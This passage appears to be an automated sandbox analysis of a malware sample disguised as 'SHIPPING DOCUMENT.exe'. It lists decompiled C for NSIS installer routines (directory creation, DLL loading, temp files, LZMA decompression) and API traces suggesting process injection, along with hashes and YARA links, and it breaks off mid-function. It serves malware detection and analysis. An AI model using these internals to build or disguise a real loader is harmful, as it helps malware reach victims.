                                            • Instruction Fuzzy Hash: C5A10070E20209EFEF12DBE4C885BEEBBB2BF08751F204459E514BA2A4C3715A90DF54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405815, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405815(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                            0x00405820
                                            0x00405824
                                            0x00405827
                                            0x0040582d
                                            0x00405831
                                            0x00405835
                                            0x0040583d
                                            0x00405844
                                            0x0040584a
                                            0x00405851
                                            0x00405858
                                            0x00405860
                                            0x00405862
                                            0x00000000
                                            0x00405862
                                            0x0040586c
                                            0x00405873
                                            0x00405889
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040588b
                                            0x0040588f

                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                            • GetLastError.KERNEL32 ref: 0040586C
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405881
                                            • GetLastError.KERNEL32 ref: 0040588B
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040583B
                                            • C:\Users\user\Desktop, xrefs: 00405815
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                            • API String ID: 3449924974-2028306314
                                            • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                            • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                                            • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                            • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004065C3, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004065C3(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                            0x004065da
                                            0x004065e3
                                            0x004065e5
                                            0x004065e5
                                            0x004065e9
                                            0x004065fb
                                            0x004065f5
                                            0x004065f5
                                            0x004065f5
                                            0x004065ff
                                            0x00406613
                                            0x00406627
                                            0x0040662e

                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004065DA
                                            • wsprintfA.USER32 ref: 00406613
                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406627
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                            • Instruction ID: 9188928b716331f4199fdf2d451d87d069fed8801fbff73d7d84d2de41a49ecb
                                            • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                            • Instruction Fuzzy Hash: D9F0F6706006097BEB249B68ED0DFEB365CAB08304F1404BEA186E10D1EA78D8358BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040209D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 60%
                                            			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x424818");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040534F(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                            0x0040209d
                                            0x0040209d
                                            0x004020a2
                                            0x004020a9
                                            0x00402164
                                            0x004022dd
                                            0x004022dd
                                            0x00402a5a
                                            0x00402a5d
                                            0x00402a69
                                            0x00402a69
                                            0x004020b8
                                            0x004020c2
                                            0x004020c5
                                            0x004020d4
                                            0x004020d8
                                            0x004020de
                                            0x004020e2
                                            0x0040215d
                                            0x00000000
                                            0x0040215d
                                            0x004020e4
                                            0x004020ed
                                            0x004020f1
                                            0x00402135
                                            0x004020f3
                                            0x004020f6
                                            0x004020f9
                                            0x00402129
                                            0x004020fb
                                            0x004020fe
                                            0x00402107
                                            0x00402109
                                            0x00402109
                                            0x00402107
                                            0x004020f9
                                            0x0040213d
                                            0x00402152
                                            0x00402152
                                            0x00000000
                                            0x0040213d
                                            0x004020c8
                                            0x004020ce
                                            0x004020d2
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                              • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                              • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                              • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
                                              • Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B
                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                            • String ID: GB
                                            • API String ID: 2987980305-3285937634
                                            • Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                            • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                                            • Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                            • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                            0x00405df4
                                            0x00405dfa
                                            0x00405dfb
                                            0x00405dfb
                                            0x00405e00
                                            0x00405e01
                                            0x00405e04
                                            0x00405e0e
                                            0x00405e1b
                                            0x00405e1e
                                            0x00405e26
                                            0x00000000
                                            0x00000000
                                            0x00405e2a
                                            0x00000000
                                            0x00000000
                                            0x00405e2c
                                            0x00000000
                                            0x00405e2c
                                            0x00000000

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405E04
                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E1E
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF3
                                            • nsa, xrefs: 00405DFB
                                            • "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" , xrefs: 00405DF0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\SHIPPING DOCUMENT.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-1605472192
                                            • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                            • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                                            • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                            • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 022B0034, Relevance: 6.5, APIs: 4, Instructions: 540processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 022B034B
                                            • GetThreadContext.KERNELBASE(?,00010007), ref: 022B036E
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 022B0392
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661312391.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThread
                                            • String ID:
                                            • API String ID: 2411489757-0
                                            • Opcode ID: fc11e96219b6c20f7f5291f4b520c38c8e96c50310bfe546a1e09eb609014dac
                                            • Instruction ID: 8b797324a956e6deeb3e805c65dd640f19daf61006930ca01350bbba6d351dd0
                                            • Opcode Fuzzy Hash: fc11e96219b6c20f7f5291f4b520c38c8e96c50310bfe546a1e09eb609014dac
                                            • Instruction Fuzzy Hash: A2221631D60219EEEB26DBE4DC45BEEB7B5BF08704F104096E608FA2A4D7709A90CF15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                            0x004015bb
                                            0x004015c2
                                            0x004015c5
                                            0x004015ca
                                            0x004015ce
                                            0x004015d0
                                            0x004015d8
                                            0x004015da
                                            0x004015dc
                                            0x004015e0
                                            0x004015e3
                                            0x004015fb
                                            0x004015fc
                                            0x004015e5
                                            0x004015e5
                                            0x004015e8
                                            0x00000000
                                            0x004015f3
                                            0x004015f4
                                            0x004015f4
                                            0x004015e8
                                            0x00401603
                                            0x0040160a
                                            0x00401617
                                            0x00401617
                                            0x0040160c
                                            0x0040160d
                                            0x00401615
                                            0x00000000
                                            0x00000000
                                            0x00401615
                                            0x0040160a
                                            0x0040161a
                                            0x0040161d
                                            0x0040161f
                                            0x00401620
                                            0x004015d0
                                            0x00401627
                                            0x00401652
                                            0x004022dd
                                            0x00401629
                                            0x0040162b
                                            0x00401636
                                            0x0040163c
                                            0x00401644
                                            0x0040164a
                                            0x0040164a
                                            0x00401644
                                            0x00402a5d
                                            0x00402a69

                                            APIs
                                              • Part of subcall function 00405C59: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nszA951.tmp,?,00405CC5,C:\Users\user\AppData\Local\Temp\nszA951.tmp,C:\Users\user\AppData\Local\Temp\nszA951.tmp,73BCFA90,?,73BCF560,00405A10,?,73BCFA90,73BCF560,00000000), ref: 00405C67
                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                              • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                              • Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661113502.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.661110204.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661119046.0000000000408000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661122918.000000000040A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661128357.0000000000413000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661135352.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661139040.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661143205.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Local\Temp
                                            • API String ID: 1892508949-47812868
                                            • Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                            • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                                            • Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                            • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 99%
                                            			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
